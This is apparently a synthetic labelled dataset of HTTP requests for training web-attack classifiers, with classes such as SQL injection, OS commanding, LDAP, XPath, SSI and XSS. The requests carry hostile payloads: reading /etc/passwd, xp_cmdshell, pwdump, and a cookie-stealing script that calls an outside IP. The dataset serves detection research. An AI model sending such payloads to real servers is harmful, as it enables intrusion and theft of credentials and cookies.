Date: Sat, 22 Mar 08 05:33:22 CET
ETag: W/"@U5uH5BLCJXO7aQTFruz"
Expect: SkhguTri
From: rtuAdC@8eshsl.biz
If-Modified-Since: Wed, 07 Feb 07 04:17:40 GMT
If-Unmodified-Since: Tue, 05 Jul 05 10:25:31 UTC
If-Match: "lGZ-Esv5nhspCkT26rdz"
If-None-Match: *
If-Range: Sat, 08 Jan 05 14:01:02 UTC
Max-Forwards: 0225
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest username="eaorh"
Authorization: wahscE w1funtlr=bta3
Range: -972278
Referer: http://ezaaDy7.de/nrqe/ipzt/naaudvt/26meahll.bin
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: ibmfka/2.5.4.9.2
UA-CPU: Sparc
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: 1.0 16.3.246.115, FTP/1.4 www.muc4tsEs.htm
Transfer-Encoding: identity
Upgrade: tOgk/7.2, 57lv/3.4, zpxc/7.9
Warning: 367 181.6.7.177:7 "oiegnotboa" 
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 9376895954650597
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44969
Start - Id: 40893
class: SSI
GET /sdynUUQ1.0Oo/ee/nveosyeo7jzttonih/omt/etAsyvyyi3hmmetl8i/teH/i4anaeaccess_logRE5G5Lhomer/nKvnz2Qz@d0zLP5/pF4kT4SYv/PKpSl3u/0hrmhzr.bin?sltsmr=391301249&forsElernew=15&hdayoeghmHen=tqYko_YjiIHx&K4jr=%3C%21--%23odbc+++++connect%3D%22o6Asbt%2Cmt%2Cp44t6%22++++++statement%3D%22select++++*+from+++w9rwo%22--%3E&eiqesaodwaw=l%40srdsyhmHd HTTP/1.0
Host: www.lwhzo.net
Connection: 8Psc
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, compress, deflate;q=0.1, deflate
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 74.22.128.43
Cookie: koOnai=<-rthaP aghomeooa-etcs;crCy=lna0hoamtaolnfdOts;nrrrthahLma=dp;ytderra6o= I;wradz=i4muwTt%teval;xMC.m=&eLkvbscripttn> ruthphe
Cookie2: $Version="39"
Date: Fri, 16 Apr 04 18:54:05 GMT
ETag: "PJL9B8l1.1S_wd_"
Expect: 100-continue
From: 2cEq@o7ggnio.cz
If-Modified-Since: Fri, 07 Aug 09 04:00:05 GMT
If-Unmodified-Since: Tue, 10 Jan 06 14:03:10 UTC
If-Match: "6BLVnQdT-ikd96ol6s"
If-None-Match: *
If-Range: Sat, 09 Aug 08 11:36:45 CET
Max-Forwards: 296
MIME-Version: 4.6
Pragma: sb=s
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: tltUu nost2=n6rl5
Range: 453-748
Referer: /eh6t/sIae/zsjUw/horedo0d/yoi9ope.asmx
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.8 (Machintosh; U; Mac OS X 7.3; dt-Tx; rv:5.9.3) Gecko/68671666
UA-CPU: x86
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/1.2 75.45.88.71
Transfer-Encoding: identity
Upgrade: r9csst/5.6, el9/0.6, zraee/3.2
Warning: 922 120.154.3.236 "qaolcnn7" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 157143505042820
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40893
Start - Id: 43624
class: OsCommanding
POST /iahhaiU8osuwiR/aLX0ho9n4maeecqasnh8/2gitewinb/odxn4jd5-gg..NQAaw/Aele6e6/VG9x3lyi4/yAfYtp5jbqtV3.php4? HTTP/1.1
Content-Length: 270
Content-Language: taleng
Content-Encoding: gzip
Content-Location: /trt5.aspx
Content-MD5: aGh4dGFCem50ZVRlOFZzdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 10 Dec 07 15:59:34 UTC
Last-Modified: Sun, 10 Jul 05 01:12:25 CET
Host: 149.206.77.207
Connection: toTIn
Accept: */*;q=0.7
Accept-Charset: windows-874, iso-8859-8;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 224.134.148.160
Cookie: b6rebrsr=ab tecag?sr e98;bnxsjtO=22289305
Cookie2: $Version="2"
Date: Wed, 26 Mar 08 08:13:16 CET
ETag: W/"_wjzjt03Jr-1UO646"
Expect: 100-continue
If-Modified-Since: Sun, 02 Aug 09 08:57:55 GMT
If-Unmodified-Since: Mon, 05 Feb 07 20:32:00 UTC
If-None-Match: *
If-Range: "bKkhbknrAVFO08k1"
Max-Forwards: 42
Pragma: no-cache
Range: 887295-
Referer: http://www.ioelikq.biz/ndtuoeas/otdo/cTea6s.fgf
TE: deflate;q=0.1,deflate;q=0.0
Trailer: From
User-Agent: mail     ln@ltrjhsqd.Oteuba.gov << /tmp/wu.c     ;
Via: 5.5 39.198.124.49, 1.4 www.ialarn.tiff:89495
Warning: 252 70.73.147.186 "pEmiltogwecsNt4" "Tue, 06 Jan 04 03:06:17 CET"

Aaea=wf|o&irnn7=344&AotthteDTi=5523758&nteo=nwhmtfcl1c&ia=8288672&hseusevsdwttott=33&geastse=Zem6&9rH6Lbinput6=7907554574&tttudedezuea7=x91bCHWT@&bie=sconnectema&ddwinntBl5DFhavinghaving=ma\o&rn=onasdrhsafpnw&boiab7e1Cp=osfY&tiowr1seh=57575&o0urcRhHMUK=iILyW-eJnWs

End - Id: 43624
Start - Id: 43251
class: OsCommanding
GET /eR/qe7qA3bms3wSxGU_Ov/aFUT/iZFfiDnOV/juanriarsCl/tG99U9UWpw9dXk@o/eOP7yWYG/oamaoot3n/htetc.swf?n6htedwoaswLn=oe&tnadNLyemvcgi=3&nH0aWycatB=80&iEodHpDn4minE=t+ua+&6lgntopasto=IIuqlWMt%27&NeOhr=%250a+++cat+%250a++++%2Fetc%2Fpasswd%250a&n9TrllRpe=IsbH&haan=7&fromXq8qops3=76008&a9oeHhT2raI=u&arslbpRmdR=YYa&lvcasikfgnNtE=home%25%40io%40sshoemrsipconnecteni&5yPnRtmhgddyh=0609&gqcsgnfTupy=yIpmotueevo6CC HTTP/1.1
Host: www.nfail6q0m.biz:66446
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: bRjaaa=oes
Client-ip: 92.41.242.45
Cookie: eWce=ataad(6emc;hessuno4sdca=iru1toeB
Cookie2: $Version="5"
Date: Sat, 14 Aug 04 21:39:35 GMT
ETag: W/"4OevjYPAXE2q_Wfy7"
Expect: 100-continue
From: w5itei@2re1ofAi.st
If-Modified-Since: Fri, 23 Jan 09 07:51:43 UTC
If-Unmodified-Since: Wed, 05 Apr 06 16:25:18 CET
If-Match: "kcfwk.AaWxjtk@RI"
If-None-Match: *
If-Range: Mon, 03 Oct 05 06:30:35 UTC
Max-Forwards: 7
MIME-Version: 8.0
Pragma: efro='teo'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: Basic SnRiYTdjMHI6MmRnYWN0
Range: 6235-,3-
Referer: /ahliEit/crmas0.pdf
TE: trailers,deflate;q=0.3
Trailer: If-Range
User-Agent: ucqooseeyrog
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 31z7/5.5 www.iczutte1.gif, 8.4 3.2.111.114, fdjnys/6.4 www.s8aal.jpg
Transfer-Encoding: identity
Upgrade: nedg/4.6, yodj/9.6
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 855673274232810386
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43251
Start - Id: 42601
class: SqlInjection
GET /ugeteoeodaneeikma/7nc4rjryamg0/whio3eg/tmmurtces6pBnm3dnbp/oujywainaElj2/cnyGm6o/ha/92cD1Y701Y3YI.sh?SztA=%27+++%29++UNION+ALL+SELECT+++++26016++++FROM++cairotr+++++WHERE+++%28++++%27%27+++%3D++++%27&6tosHp=or&utstoultrmuto=eGcJ76v&wsnlnmosenirspn=Ts HTTP/1.1
Host: 62.2.1.94
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.1
Cache-Control: 34b='t'
Client-ip: 120.51.46.153
Cookie: wt29fi6mOt9leel=tYlVR;xasnx=7
Cookie2: $Version="813"
Date: Sun, 22 Jan 06 06:59:45 CET
ETag: W/"YE2VikvVOlQUo3__"
Expect: igmxt
From: ioed@oROvlcftKp.biz
If-Modified-Since: Sat, 11 Feb 06 11:53:58 CET
If-Unmodified-Since: Wed, 23 Sep 09 17:43:26 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9913
MIME-Version: 0.0
Pragma: allzlcoe='30rue'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM YTd1cm9jYW5penRTaGxzYWhobG9vaXRyODRnbXRpaUxTZEVTcA==
Referer: /y0s7he/eroh5ee/t0ptbei6/zN5edo/cstwtml.sh
TE: chunked
User-Agent: ebeZhxeshhesdy
UA-CPU: Sparc
UA-Disp: 4133,8176,16
Via: 5.1 www.ndaaf.css, 4.7 251.208.110.245:14
Transfer-Encoding: identity
Warning: 159 192.87.208.139 "nshFuefcm8" 
X-Forwarded-For: 35.161.132.69
----: -----------

null

End - Id: 42601
Start - Id: 38431
class: LdapInjection
GET /lhsS4oomtrrtsCoer/noixdO.rzBzJHV6_SZ/m7j.cgi?R6Asv3s=bW3j&rrtsdzolt=m%5Dt&Sjo=msanagetnf9a3usock_stream%5Dae&0fYAj8QCphJ=h%3Bast&hihthn=tsa5srscript+&teI=218%29%28%26%28objectClass%3Dcrn%29%28%7C%28sn+++%3D++neyv%29%28cn%3Dturl++++J*%29%29&dyhw=26&hnmaeotwh4mwf=579559&ntcardttetro0ia=8076&ierodOhsr=CmXndrs&let4=%7E%3Cu%7E%3FioLxp_d%2B0jas&9G@m=5spc%3Aeance%24&tHtrwcajddModp=84802731&lddporMsesiw7=i0tVBwC&oownt0thyks=22647757 HTTP/1.1
Host: 255.12.234.91
Connection: keep-alive
Accept: video/quicktime;q=0.0
Accept-Charset: isiri-3342, big5, big5;q=0.3, euc-tw
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 37.157.72.85
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="91"
Date: Sat, 02 May 09 05:00:13 UTC
ETag: "h2hIDmqhIElhbZTSdh1"
Expect: 100-continue
From: Le6sx3@8TUli.gov
If-Modified-Since: Sun, 07 Mar 04 22:56:58 GMT
If-Unmodified-Since: Thu, 10 Jul 08 13:09:39 GMT
If-Match: "712EoZePzsgl@wK"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 3.3
Pragma: s='ecco'
Proxy-Authorization: Digest cnonce="twseli3"
Authorization: Basic YlBmZG46YWFub2E=
Range: -03,38-
Referer: /intJrdef.exe
TE: gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.2 (compatible; Konqueror/6.8; SunOS sun4u; aOiwz; aAeoTa)
UA-CPU: 68000
UA-Disp: 471,4327,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0696x1408
Via: HTTP/5.6 www.nfyinLsr.png:5088, FTP/6.0 www.hnaeu7si.tiff, vhoat/7.0 www.gsod.jpg
Transfer-Encoding: identity
Upgrade: lig/4.2, roeri/4.4
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 180.11.72.245
X-Serial-Number: 8565701730547644653
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38431
Start - Id: 37314
class: LdapInjection
GET /epChEFf-mN-u931MhA/LdYr/abZwJ7jK.mdb?toiw=517 HTTP/1.1
Host: www.r97nn.ch
Connection: tiires
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 181.208.243.92
Cookie: e8iddu=488;eeeitatJReaoioS=806
Cookie2: $Version="1"
Date: Wed, 08 Aug 07 15:38:48 CET
ETag: "SqzTXG3cL_LrKvg7K"
Expect: 100-continue
From: rtec@se2cehaQn.com
If-Modified-Since: Fri, 20 Feb 04 08:16:42 GMT
If-Unmodified-Since: Fri, 20 Jun 08 06:27:56 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 29 Nov 08 19:46:56 CET
Max-Forwards: 8901
MIME-Version: 4.6
Pragma: hnno13=t
Proxy-Authorization: Basic bmNlYWVudW06b2lvb2Fh
Authorization: Basic bGd0ZWk6dHRYZXNv
Range: 1-568088,6956-8,075-
Referer: http://www.tonh.de/lemgu/gpeezE/akRg6/ttugws/ruai.pdf
TE: chunked;q=0.4,trailers,gzip
Trailer: If-Range
User-Agent: ) (   | (displayName=had*)(name =  had*  )(   mail=had*    )
UA-CPU: StrongARM
UA-Disp: 050,5091,32
UA-Color: color16
Via: 1.3 81.254.125.126, 1.1 119.43.180.223, HTTP/3.5 www.aruteeC.js
Transfer-Encoding: gzip
Upgrade: cgnl/2.0
Warning: 537 241.108.176.114:3 "suareips" 
X-Forwarded-For: 97.235.140.149
X-Serial-Number: 8290332205189510
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 37314
Start - Id: 49203
class: XPathInjection
GET /sneZvX/eseIee8ehzaiurhtN/51xbO-IUcuVJ9lBP/oene27Naet9e/sC8sV9Likd9bwnQD/oj2.dll?eNshiYmies=nhoyhtivnntuu&euaci=dCjRe5Rb&ng1akhhpint=vl%40&DeeqoAelatgng=m9hccVy&1kityinho9=5p5IHNe%40&glerp2olios=vbscripte&94P8gNF=9401&OyiKege7No=yIlscl9h%27++++or+++pczif7%2Fdf%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D1%5D+or++++%27r5feQnp%27%3D++++%27&dvGvf=tPeq70Xhu&r94tauajnRp=xtermn&titensv=9&khft=a&eei4oijAut=4654859&b41iwjeeneble=4&etwme=newrmSsdaCr HTTP/1.1
Host: 1.219.236.19
Connection: psya
Accept: */*;q=0.4
Accept-Charset: iso-8859-9;q=0.4, windows-874
Accept-Encoding: compress;q=0.0, deflate;q=0.3
Accept-Language: *;q=0.5
Cache-Control: max-age=705
Client-ip: 0.187.188.191
Cookie: dtwlri=8 tt98)|anl;ndt4p=?link\likeem'pr%Eu9Rr8-Yea;tn3=yHJCzARfzq;hsvn=tSapobceznnkues;rrauOah4arqui=iJ@inarpassthruRtn7idekuinput$;SDHWpJ=aH2t7
Cookie2: $Version="2"
Date: Thu, 23 Jul 09 02:08:24 CET
ETag: "_DeHBysckI4RzyNKLtM"
Expect: kwohSom
From: Gswzt6t2@seem.gov
If-Modified-Since: Tue, 13 Oct 09 23:18:33 GMT
If-Unmodified-Since: Mon, 02 Jun 08 23:20:41 CET
If-Match: "clsHUmYoo1UHSgsn6@"
If-None-Match: *
If-Range: *
Max-Forwards: 63
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: Basic cHJybjo3b21JaXI=
Range: -392691
Referer: /iesoh/nstne/stho.css
TE: chunked,chunked;q=0.0
Trailer: Authorization
User-Agent: Mozilla/2.5 (compatible; nuwtba6tmk; Unix; tynAenstnt; 9s3hhHtz)
UA-CPU: MIPS
UA-Disp: 2354,727,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6245x946
Via: 9.6 www.hama5ons.html
Transfer-Encoding: compress
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 730 219.205.127.123 "usTsd6rt4" "Mon, 01 Nov 04 10:01:00 CET"
X-Forwarded-For: 243.220.220.113
X-Serial-Number: 094897870
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49203
Start - Id: 49388
class: XPathInjection
GET /pbkY9hFL2rE5Kj4/sb.shtml?srli7gi6gza=29&orhenothenl10i6=rqw5hn&d2foLnlib13JxL=oNn&UMlogDORO3=%25lw%3Edc%2F&bgsoundDby=mt&tnrc27eiiddgu=tnwa&EbeSit7yar=taee&toacTfieheOt=z.r6&aEehiDlAr8=0h%3Eo+ale6lAet&ahheht=ac&sh=oYPFEN0XDII.&eu=7134846&ca9h47Hjtcg=ht%5Ciae&nyp=fmeoru0%27+or+++6+%3C++++count%28path%2Fchild%3A%3A*%29+++++or++%27ron%27++%3D+++%27&1.JyFK6scriptinsert7=nySbAX HTTP/1.1
Host: www.urcE.be
Connection: sSen
Accept: audio/x-wav, video/*, text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: mIirli-dsfa
Cache-Control: min-fresh=1483
Client-ip: 60.131.206.78
Cookie: aylxyMNlE=ehurugc
Cookie2: $Version="1"
Date: Thu, 05 Mar 09 23:31:33 UTC
ETag: W/"2TMjTj3nMjRhbDH037L"
Expect: iploeea=erto
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Mon, 26 Apr 10 01:23:44 GMT
If-Unmodified-Since: Mon, 06 Nov 06 21:28:57 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Jan 09 21:09:50 CET
Max-Forwards: 091
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: Basic aWQ0ZTpuZG9mcm5u
Range: -33311,24-
Referer: /eNee/nqa4l/i6mo/rulDw4aa/s1Eo1nw.cfm
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/6.1 (X11; U; Linux i386 7.8; ee-an; rv:8.8.6) Gecko/33251864
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0695x2392
Via: 8efe/3.4 www.iaarsdri.css
Transfer-Encoding: rr9Hr
Upgrade: titdOa/5.1
Warning: 873 179.220.247.176 "a53nepbizi" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 9327975536472
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49388
Start - Id: 46953
class: XSS
PUT /sWb/ridcmxtse2ojpt/execchildhttps4Mj_location.qO/asocrhOb4liirtrlno/dG/ce91iouIxmd/cpneelihr/sKalld8HL67ULpO.nsf? HTTP/1.1
Content-Length: 404
Content-Language: adnT
Content-Encoding: deflate
Content-Location: /ce87asak/nwatht/ynoati/O6ebzhr5/baatawWo.conf
Content-MD5: eHdkb2Vrb2xvZWFFd3JzMw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Apr 05 04:41:52 GMT
Last-Modified: Wed, 16 Nov 05 15:05:50 CET
Host: www.lednbyeR.com
Connection: close
Accept: text/*, image/*;q=0.5, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.3
Cache-Control: max-age=40645
Client-ip: 15.111.69.143
Cookie: geebansc=e8vEkOUN;eiabov0mreurf=zgNIeySc9H;zdcbinZH3=egiisxyzir\nr2
Cookie2: $Version="52"
Date: Tue, 20 Jan 04 14:17:27 CET
ETag: "NViduy7oqvlSc-i"
Expect: mexltil=sUytWu
From: trhir@9toer.gov
If-Modified-Since: Sat, 08 Sep 07 02:06:19 GMT
If-Unmodified-Since: Sun, 08 Jul 07 12:09:50 CET
If-Match: "S4vIIFLQRqZ8yp.V.L1V"
If-None-Match: "ys@0adoX_F41_.aRsRgV"
If-Range: *
Max-Forwards: 8
MIME-Version: 5.4
Pragma: atuneta=r7E
Proxy-Authorization: Basic Z2VveGk6ZXRhbjFvdA==
Authorization: EbVht ttmrelsa=rtwds
Range: -3291
Referer: http://mOtit.it/neCr97n/h7b7y/uy1twg.mdb
TE: trailers,gzip
User-Agent: Mozilla/9.4 (X11; U; Open BSD i586 2.4; sA-ri; rv:3.8.7) Gecko/06662577
UA-CPU: StrongARM
UA-Color: color8
Via: 5.3 151.186.75.226, FTP/8.3 www.dyeahsn.gif
Transfer-Encoding: compress
Upgrade: eOo/2.9, nd6H1f/1.0, mciu/8.9
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pCi=2nc&aintrt3trsi=nHDix_8G6K&ZKGjLuAXT=stwbekohiw6dge6vm&rinhyott=683515&ltosi58dS4se=[\xC0][\xBC]script  >[window.open('http://16.3.116.45/ve.sh'+document.cookie);][\xC0][\xBC]/script>&4mpTt=leri&httpsaogsdnaf&ssEhyrs=uiNhElm&xbire7wa=0&Ion=hsizxboaeosc6nee&rrHnhaelema=ntbgsoundRz&xQ_wYHf=625&qawSj6=6&latOThnlISse=o/=m&meUeenhcoeeb=eecho-r

End - Id: 46953
Start - Id: 41146
class: SqlInjection
GET /hK_Xlnz/eC6394@7AM60IT/evG2eTMYEbINB6vh4@/euT6GSpXERlPs/Krtqreeuor/1lrb1lMnE5YP.bin?yiicrghpuwen=dEHehrbOt2gscj&dbhnrtshal7llcl=XxaoeusW3o&mtiice=387&Hirt7zgrRqesl=6642&hpfn=iailbt&eiardwzte6t=r.CkP1&7UbovinhntL=5&nrceopG=308&os=Ihtacces&tBeBpsllunrEhn=toqnhgoimisdte&nrr4Cpnvo=t%3Dxd&droojyfa=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe&9n=t&RG@Pb-WApwinntd=00577 HTTP/1.1
Host: www.rrAdtcol.de:8
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic, iso-10646-ucs-2
Accept-Encoding: compress, gzip, gzip, gzip
Accept-Language: *
Cache-Control: rn=8
Client-ip: 59.117.147.78
Cookie: 316t.TIQEg=hap
Cookie2: $Version="645"
Date: Wed, 16 Sep 09 03:58:29 GMT
ETag: "3gWmZjep6Aga7L5S"
Expect: 100-continue
From: txaWstrh@gamw.fr
If-Modified-Since: Sun, 19 Feb 06 18:22:32 GMT
If-Unmodified-Since: Mon, 17 Sep 07 16:17:01 GMT
If-Match: *
If-None-Match: *
If-Range: "8zPXoHeB9Z8VOyxO"
Max-Forwards: 191
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=nnLn
Authorization: hsyo a1athee=oysetv
Range: 70-3
Referer: http://www.aetX.st/cvsrhs/anrch/zashrfEg/Aie16c.sh
TE: trailers
Trailer: Date
User-Agent: Dna7Dy9eue/8.6.7.0
UA-CPU: Sparc
UA-Disp: 952,1268,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6392x3282
Via: seu/2.2 77.65.209.13, 1.2 www.owTmce.gif
Transfer-Encoding: compress
Upgrade: ng6s/4.8, 4et/8.2
Warning: 458 www.anke2uT.gif "btsiteht9hIieeLwah" 
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 566074493
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41146
Start - Id: 42418
class: SqlInjection
GET /t1sbrhonaeoegwsznin/inbKz3Ssve/GfromC.Q.css?FBY42UDdmst=%27+union+select+++sum%28tetntt%29+from+p9euf0st--&llBPKk@PAdG=56579596&etsk3lt=65588287&clt0r=338&xmUj.pE0J.A5=oLHt&q71CAGCrIr=mT HTTP/1.0
Host: 104.84.179.182
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-1;q=0.9, euc-kr, euc-tw
Accept-Encoding: *;q=0.2
Accept-Language: eFj12y-rxlS2i
Cache-Control: no-cache
Client-ip: 179.176.205.80
Cookie: erong47mhdareol=rhttMvtg5rPdwvltbd;e1AorkPuisa=895581;sonrnlodHse=iklmail7ifromt;-Ny5GdZsm=ioi7Ost;88=sTvoer
Cookie2: $Version="78"
Date: Wed, 03 Oct 07 17:58:41 UTC
ETag: "ihNWxKiFaZe3DCw"
Expect: 100-continue
From: Tm9x@je4xi.it
If-Modified-Since: Thu, 01 Apr 04 14:45:31 CET
If-Unmodified-Since: Sat, 31 Dec 05 08:46:49 UTC
If-Match: "-ffPhpV3OKtYwCFYBc"
If-None-Match: *
If-Range: Thu, 12 Jul 07 13:56:14 UTC
Max-Forwards: 6127
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic YWV0ZWJwdzplbHdOZm1lcg==
Authorization: NTLM V2hvOXR0dG5uRmF3ZEVhbzllbTF0c1VrZXZpaGk2bklaOGVYVWl3ZW9jZlBk
Range: 005696-6624,4-
Referer: http://www.enTi8lns.de/a8intiir/eoalp/iroe/oaztsi5i.php3
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/2.7 (compatible; iesE; Solaris; yoahO)
UA-CPU: 68000
UA-Disp: 4009,500,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 189x646
Via: FTP/6.5 155.40.44.155, 9.8 115.107.192.121:2590
Transfer-Encoding: compress
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 520 206.128.137.82 "k8cmwoU" "Thu, 21 Jul 05 08:42:03 UTC"
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42418
Start - Id: 41111
class: SqlInjection
GET /GtmpF/wqoSNDs/zpZ93zSHf/r9.L8m.Zmyedy4X2tJP5/gb.gif?ngTsdFbuurvarl=bulk+++insert++++llk+from++++%27pwdump.exe%27++++++++with++++%28codepage%3D%27RAW%27++%29&adeh4Nr=w8k HTTP/1.0
Host: 234.58.85.191
Connection: lehne
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 28poab7-csreate;q=0.9
Cache-Control: max-stale=64078
Client-ip: 190.211.91.23
Cookie: ho=32;sduip=huupdtpi
Cookie2: $Version="75"
Date: Fri, 03 Sep 04 03:33:29 GMT
ETag: "o2wljYaHrxuGgPOQDnb6"
Expect: iCconail
From: ljbnc@t4tt.net
If-Modified-Since: Thu, 23 Oct 08 01:17:30 GMT
If-Unmodified-Since: Tue, 21 Nov 06 23:51:28 CET
If-Match: "xnzKaIKtoXGkFWKu_JP"
If-None-Match: *
If-Range: "Ggq11yjwKPT7am@PB"
Max-Forwards: 4127
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="sqsll"
Authorization: Digest realm
Range: -397
Referer: http://e7e7dti.be/radpi8/Aivy3ht/NakSbaef/qesa.mdb
TE: gzip
Trailer: Accept-Language
User-Agent: fFRh08tG http://www.4SSteoy9.uk
UA-CPU: Sparc
UA-Disp: 071,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 194x0684
Via: FTP/6.7 www.nChhkume.jpg, 5.8 www.tdA5iaga.tiff
Transfer-Encoding: matoan; jymwutb=eigrn
Upgrade: mdt/1.4, asjofr/9.3, 9meo/3.8
Warning: 323 www.l1Er.tiff "djhflegmslO" "Thu, 15 Apr 04 02:45:31 UTC"
X-Forwarded-For: 120.66.15.37
X-Serial-Number: 54708069609443708
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41111
Start - Id: 37383
class: LdapInjection
GET /JhipositionVDYKVVR/idrhdptayolnrlr/ThtpassOrTc.sP/scTgVrLg5IT6gY/ExcnokivdshpadirOro/rZuLb_bW-O.jpeg?Nssyus8=etet0htsmiywoaexOp&No6PallBT3Z5.I=arNMd4&bsuppa=kBLXjq04 HTTP/1.0
Host: www.shxareus.fr
Connection: close
Accept: */*;q=0.0
Accept-Charset: ks_c_5601-1987;q=0.7, iso-8859-15;q=0.9, x-mac-greek
Accept-Encoding: xm)(  |  (Rei=*)
Accept-Language: su-edofts;q=0.9, 4qtedlte-e;q=0.4
Cache-Control: max-stale=53590
Client-ip: 6.207.230.77
Cookie: lcso=m4u;mjs8cS58ik=Ezu4h4 bin&l(tia
Cookie2: $Version="87"
Date: Fri, 19 Nov 04 03:28:22 GMT
ETag: W/"C8bvM3CyILQe0CHkK"
Expect: 100-continue
From: dbhtn@kidta.ch
If-Modified-Since: Sat, 21 Aug 04 15:48:45 GMT
If-Unmodified-Since: Tue, 22 Nov 05 13:14:02 GMT
If-Match: "feF-OPAkIbsWMTB1v"
If-None-Match: "hc-utPdBEwwy1whc"
If-Range: Sun, 13 May 07 19:31:05 CET
Max-Forwards: 6
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest cnonce="imac"
Range: 059445-,841-
Referer: http://nrvtd17.gov/eeesahet/abasetEo/taNbeliv.php
TE: gzip;q=0.1,trailers,trailers
Trailer: Range
User-Agent: dq0tzhjmh/8.3.0.1
UA-OS: Windows 95
UA-Pixels: 040x3163
Via: 0.1 85.247.181.13, 0.6 www.aehi.html, 9.9 4.206.37.196
Transfer-Encoding: deflate
Upgrade: rYmis/4.7
Warning: 557 53.236.155.130 "jldgqstdtirts" "Fri, 23 Jun 06 24:53:15 CET"
X-Forwarded-For: 78.198.208.28
X-Serial-Number: 71830
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37383
Start - Id: 40399
class: SSI
